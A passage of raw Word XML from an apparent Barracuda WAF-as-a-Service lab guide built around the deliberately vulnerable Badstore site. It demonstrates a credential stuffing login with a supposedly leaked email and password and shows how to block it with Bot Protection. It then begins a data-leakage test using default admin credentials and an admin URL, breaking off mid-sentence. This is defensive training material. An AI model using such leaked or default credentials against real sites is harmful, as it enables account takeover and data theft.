        <w:rPr/>
        <w:t>Before</w:t>
      </w:r>
      <w:r w:rsidR="00531615">
        <w:rPr/>
        <w:t xml:space="preserve"> &amp; After</w:t>
      </w:r>
      <w:r w:rsidR="6CDA5E8D">
        <w:rPr/>
        <w:t xml:space="preserve"> showing the JavaScript and Hidden Links</w:t>
      </w:r>
      <w:r w:rsidR="008A4FBA">
        <w:drawing>
          <wp:inline wp14:editId="4FAB8F36" wp14:anchorId="7F7F6925">
            <wp:extent cx="5019676" cy="1631394"/>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4573d0085800470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19676" cy="1631394"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00951BD4">
        <w:drawing>
          <wp:inline wp14:editId="44766105" wp14:anchorId="0022D986">
            <wp:extent cx="5040570" cy="1569488"/>
            <wp:effectExtent l="0" t="0" r="9525"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ce99370dfbcb428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040570" cy="1569488"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="009F0E5E">
        <w:drawing>
          <wp:inline wp14:editId="55A92FB0" wp14:anchorId="47C256EA">
            <wp:extent cx="5949950" cy="34988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deab6fa2ebde45b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9950" cy="349885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64035" w:rsidRDefault="00D64035" w14:paraId="5468B164" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8004C" w:rsidP="001A0E4D" w:rsidRDefault="00B8004C" w14:paraId="43119F20" w14:textId="45632955">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidR="7268CE5C">
        <w:rPr/>
        <w:t xml:space="preserve">Testing for </w:t>
      </w:r>
      <w:r w:rsidR="00B8004C">
        <w:rPr/>
        <w:t>Credential Stuffing</w:t>
      </w:r>
      <w:r w:rsidR="61CC711F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="61CC711F">
        <w:rPr/>
        <w:t>Vul</w:t>
      </w:r>
      <w:r w:rsidR="16B15313">
        <w:rPr/>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="61CC711F">
        <w:rPr/>
        <w:t>erabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3DB4835F" w:rsidRDefault="3DB4835F" w14:paraId="2144BCDA" w14:textId="408BAE49"/>
    <w:p w:rsidR="002F2ECF" w:rsidP="00051308" w:rsidRDefault="00A37923" w14:paraId="3866ECA3" w14:textId="153A9662">
      <w:r w:rsidR="00A37923">
        <w:rPr/>
        <w:t xml:space="preserve">There are </w:t>
      </w:r>
      <w:r w:rsidR="16967EDC">
        <w:rPr/>
        <w:t>many</w:t>
      </w:r>
      <w:r w:rsidR="00A37923">
        <w:rPr/>
        <w:t xml:space="preserve"> leaked credentials o</w:t>
      </w:r>
      <w:r w:rsidR="24D0B571">
        <w:rPr/>
        <w:t>n the darknet</w:t>
      </w:r>
      <w:r w:rsidR="00D64035">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D64035">
        <w:rPr/>
        <w:t xml:space="preserve">being used for things like Account Take Overs </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D64035">
        <w:rPr/>
        <w:t>( ATO</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D64035">
        <w:rPr/>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidR="59B01C8E">
        <w:rPr/>
        <w:t xml:space="preserve"> and Barracuda WAF-as-a-Service can </w:t>
      </w:r>
      <w:r w:rsidR="55CEF373">
        <w:rPr/>
        <w:t xml:space="preserve">determine if an attacker is using leaked </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="55CEF373">
        <w:rPr/>
        <w:t>credentials, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="55CEF373">
        <w:rPr/>
        <w:t xml:space="preserve"> can block this attack.  This type of attack is known as Credential Stuffing. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2EBF163D" w:rsidP="3DB4835F" w:rsidRDefault="2EBF163D" w14:paraId="3CE292E3" w14:textId="34B8C7C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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2EBF163D">
        <w:rPr/>
        <w:t xml:space="preserve">In your web browser, go to </w:t>
      </w:r>
      <w:r w:rsidR="20B7EF26">
        <w:rPr/>
        <w:t xml:space="preserve">either </w:t>
      </w:r>
      <w:r w:rsidR="1FCAF382">
        <w:rPr/>
        <w:t xml:space="preserve">your </w:t>
      </w:r>
      <w:r w:rsidR="4B067AB0">
        <w:rPr/>
        <w:t>WAFaaS CNAME</w:t>
      </w:r>
      <w:r w:rsidR="7DB33D2D">
        <w:rPr/>
        <w:t xml:space="preserve"> or your Badstore Domain Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F2ECF" w:rsidP="50C40F79" w:rsidRDefault="00A37923" w14:paraId="33A0E695" w14:textId="5F5ECC51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00A37923">
        <w:rPr/>
        <w:t>Click Login / Register</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F2ECF" w:rsidP="50C40F79" w:rsidRDefault="00A37923" w14:paraId="5A41AC19" w14:textId="2282668C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="130822AA">
        <w:rPr/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00A37923">
        <w:rPr/>
        <w:t>ry logging in as</w:t>
      </w:r>
      <w:r w:rsidR="00956929">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="R1d4de15f60384ec5">
        <w:r w:rsidRPr="3DB4835F" w:rsidR="00956929">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>julio.tan@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00956929">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="45E10EF9">
        <w:rPr/>
        <w:t xml:space="preserve">and password: </w:t>
      </w:r>
      <w:r w:rsidR="00956929">
        <w:rPr/>
        <w:t xml:space="preserve">please </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A37923" w:rsidP="3DB4835F" w:rsidRDefault="002F2ECF" w14:paraId="20626A33" w14:textId="5FBFC526">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="002F2ECF">
        <w:rPr/>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidR="00707FF5">
        <w:rPr/>
        <w:t xml:space="preserve">ou will see the login </w:t>
      </w:r>
      <w:r w:rsidR="00956929">
        <w:rPr/>
        <w:t xml:space="preserve">simply </w:t>
      </w:r>
      <w:r w:rsidR="00707FF5">
        <w:rPr/>
        <w:t>fails</w:t>
      </w:r>
      <w:r w:rsidR="002F2ECF">
        <w:rPr/>
        <w:t xml:space="preserve"> because </w:t>
      </w:r>
      <w:r w:rsidR="002F2ECF">
        <w:rPr/>
        <w:t>that’s</w:t>
      </w:r>
      <w:r w:rsidR="002F2ECF">
        <w:rPr/>
        <w:t xml:space="preserve"> not a valid user</w:t>
      </w:r>
      <w:r w:rsidR="059BF791">
        <w:drawing>
          <wp:inline wp14:editId="6166D337" wp14:anchorId="13A492C4">
            <wp:extent cx="2686050" cy="1132101"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="722577702" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R3b35db91291249d7">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2686050" cy="1132101"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A37923" w:rsidP="3DB4835F" w:rsidRDefault="002F2ECF" w14:paraId="23F1ED5C" w14:textId="086B1312">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1B44A1D6">
        <w:rPr/>
        <w:t xml:space="preserve">But that set of credentials is from a leaked database and is a credential stuffing attack.  But your website </w:t>
      </w:r>
      <w:r w:rsidR="4C53E41B">
        <w:rPr/>
        <w:t>does no</w:t>
      </w:r>
      <w:r w:rsidR="00FD1762">
        <w:rPr/>
        <w:t xml:space="preserve">t </w:t>
      </w:r>
      <w:r w:rsidR="00FD1762">
        <w:rPr/>
        <w:t xml:space="preserve">know </w:t>
      </w:r>
      <w:r w:rsidR="6973DDC0">
        <w:rPr/>
        <w:t xml:space="preserve">it is </w:t>
      </w:r>
      <w:r w:rsidR="00FD1762">
        <w:rPr/>
        <w:t>under attack.</w:t>
      </w:r>
      <w:r w:rsidR="5C82D796">
        <w:rPr/>
        <w:t xml:space="preserve">  Also, by default, WAFaaS will not block this, we need to add the </w:t>
      </w:r>
      <w:r w:rsidR="4FEF66F0">
        <w:rPr/>
        <w:t xml:space="preserve">Bot Protection </w:t>
      </w:r>
      <w:r w:rsidR="5C82D796">
        <w:rPr/>
        <w:t xml:space="preserve">component </w:t>
      </w:r>
      <w:r w:rsidR="3C074A6D">
        <w:rPr/>
        <w:t xml:space="preserve">to block </w:t>
      </w:r>
      <w:r w:rsidR="5C82D796">
        <w:rPr/>
        <w:t>this.</w:t>
      </w:r>
      <w:r w:rsidR="21C2DEFD">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C3974" w:rsidP="50C40F79" w:rsidRDefault="00956929" w14:paraId="258D9D20" w14:textId="3BD4D02D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidR="2079B63C">
        <w:rPr/>
        <w:t xml:space="preserve">Blocking Credential Stuffing </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C3974" w:rsidP="3DB4835F" w:rsidRDefault="00956929" w14:paraId="2331654B" w14:textId="7AB64A4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00956929">
        <w:rPr/>
        <w:t>Go to your WAFaaS admin tab and a</w:t>
      </w:r>
      <w:r w:rsidR="00051308">
        <w:rPr/>
        <w:t xml:space="preserve">dd the </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00051308">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Bot Protection</w:t>
      </w:r>
      <w:r w:rsidR="00051308">
        <w:rPr/>
        <w:t xml:space="preserve"> component</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C3974" w:rsidP="50C40F79" w:rsidRDefault="00956929" w14:paraId="19142963" w14:textId="5681F7D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="506818D2">
        <w:rPr/>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="004C3974">
        <w:rPr/>
        <w:t xml:space="preserve">lick </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="004C3974">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Bot Attacks</w:t>
      </w:r>
      <w:r w:rsidR="004C3974">
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C80E1A">
        <w:rPr/>
        <w:t xml:space="preserve">then </w:t>
      </w:r>
      <w:r w:rsidR="004C3974">
        <w:rPr/>
        <w:t xml:space="preserve">under </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="004C3974">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Credential </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="1B59BD06">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Attack Protection</w:t>
      </w:r>
      <w:r w:rsidR="1B59BD06">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C3974">
        <w:rPr/>
        <w:t xml:space="preserve">enter </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C3974" w:rsidP="50C40F79" w:rsidRDefault="00956929" w14:paraId="783F0A08" w14:textId="0BB0E07B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="004C3974">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r w:rsidR="004C3974">
        <w:rPr/>
        <w:t xml:space="preserve"> for the username field </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C3974" w:rsidP="3DB4835F" w:rsidRDefault="004C3974" w14:paraId="1B3B0B9A" w14:textId="13A25CDE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="004C3974">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:r w:rsidR="004C3974">
        <w:rPr/>
        <w:t xml:space="preserve"> for the password field </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C3974" w:rsidP="3DB4835F" w:rsidRDefault="004C3974" w14:paraId="7CDA8215" w14:textId="666FD605">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="004C3974">
        <w:drawing>
          <wp:inline wp14:editId="2185DE20" wp14:anchorId="5672F36E">
            <wp:extent cx="2628900" cy="1557398"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="16" name="Picture 16" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 16"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R3fadcfe898ab4eb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28900" cy="1557398"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956929" w:rsidP="50C40F79" w:rsidRDefault="00956929" w14:paraId="730DFA3C" w14:textId="3505AE2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00956929">
        <w:rPr/>
        <w:t>Go to your WAFaaS CNAME</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956929" w:rsidP="50C40F79" w:rsidRDefault="00956929" w14:paraId="308AD803" w14:textId="4C2C704A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00956929">
        <w:rPr/>
        <w:t xml:space="preserve">Click Login / Register </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5D98305C" w:rsidP="50C40F79" w:rsidRDefault="5D98305C" w14:paraId="47FD85DC" w14:textId="18575A5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5D98305C">
        <w:rPr/>
        <w:t xml:space="preserve">Try logging in as </w:t>
      </w:r>
      <w:hyperlink r:id="R38943dc6517d43c9">
        <w:r w:rsidRPr="3DB4835F" w:rsidR="5D98305C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>julio.tan@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="5D98305C">
        <w:rPr/>
        <w:t xml:space="preserve"> and password: please</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C3974" w:rsidP="00051308" w:rsidRDefault="00956929" w14:paraId="78EBACBA" w14:textId="20CF9ED5">
      <w:r w:rsidR="00956929">
        <w:rPr/>
        <w:t>Verify the WAFaaS blocks this, and the Firewall Log shows</w:t>
      </w:r>
      <w:r w:rsidR="004739DE">
        <w:rPr/>
        <w:t xml:space="preserve"> this</w:t>
      </w:r>
      <w:r w:rsidR="00FD1762">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C3974" w:rsidP="00051308" w:rsidRDefault="00956929" w14:paraId="513F1BC5" w14:textId="6A62974B">
      <w:r w:rsidR="00FD1762">
        <w:rPr/>
        <w:t xml:space="preserve">Now we know we are under a credential stuffing </w:t>
      </w:r>
      <w:r w:rsidR="00FD1762">
        <w:rPr/>
        <w:t xml:space="preserve">attack, </w:t>
      </w:r>
      <w:r w:rsidR="0AEC8A8F">
        <w:rPr/>
        <w:t xml:space="preserve">but are protected from it, and we know details of the attacker such as their source IP address. </w:t>
      </w:r>
      <w:r w:rsidR="00FD1762">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956929" w:rsidP="00051308" w:rsidRDefault="004739DE" w14:paraId="1064857C" w14:textId="4B0BF644">
      <w:r w:rsidR="004739DE">
        <w:drawing>
          <wp:inline wp14:editId="54A49467" wp14:anchorId="24F367DF">
            <wp:extent cx="5943600" cy="1619250"/>
            <wp:effectExtent l="0" t="0" r="0"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3458950c2bb447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619250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B2651A" w:rsidRDefault="00B2651A" w14:paraId="0BC100E7" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009307BA" w:rsidP="001A0E4D" w:rsidRDefault="009307BA" w14:paraId="229E2784" w14:textId="1CCBD28B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidR="4B4640C1">
        <w:rPr/>
        <w:t xml:space="preserve">Testing for </w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t xml:space="preserve">Credit Card </w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:rPr/>
        <w:t xml:space="preserve">PII </w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t>Leakage</w:t>
      </w:r>
      <w:r w:rsidR="5009B39E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7FDED7F7">
        <w:rPr/>
        <w:t>Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009307BA" w:rsidP="32F6121D" w:rsidRDefault="009307BA" w14:paraId="7FFABB8B" w14:textId="67AAAD6B">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="7FDED7F7">
        <w:rPr/>
        <w:t xml:space="preserve">We were </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">showing off </w:t>
      </w:r>
      <w:r w:rsidR="050A264D">
        <w:rPr/>
        <w:t>our</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> reporting system to our auditor last week.  </w:t>
      </w:r>
      <w:r w:rsidR="20AC8607">
        <w:rPr/>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t xml:space="preserve">logged into the site’s admin interface by going to the </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="009307BA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>“Login/Regist</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00220C64">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>er</w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t>” page, entering “</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="009307BA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t>” in the username box and “</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="009307BA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t>” in the password</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> box.  Then </w:t>
      </w:r>
      <w:r w:rsidR="579A378A">
        <w:rPr/>
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> went to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>Super Secret</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> Administration Menu by navigating to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00D140A2">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00D140A2">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00D140A2">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>badstore.cgi?action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00D140A2">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00D140A2">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">admin </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="075EE215">
        <w:rPr/>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> chose “</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00D140A2">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>View Sales Reports</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>” and clicked “</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00D140A2">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Do It</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">.”  </w:t>
      </w:r>
      <w:r w:rsidR="6D6B2801">
        <w:rPr/>
        <w:t>Our auditor</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5B19447E">
        <w:rPr/>
        <w:t>told us</w:t>
      </w:r>
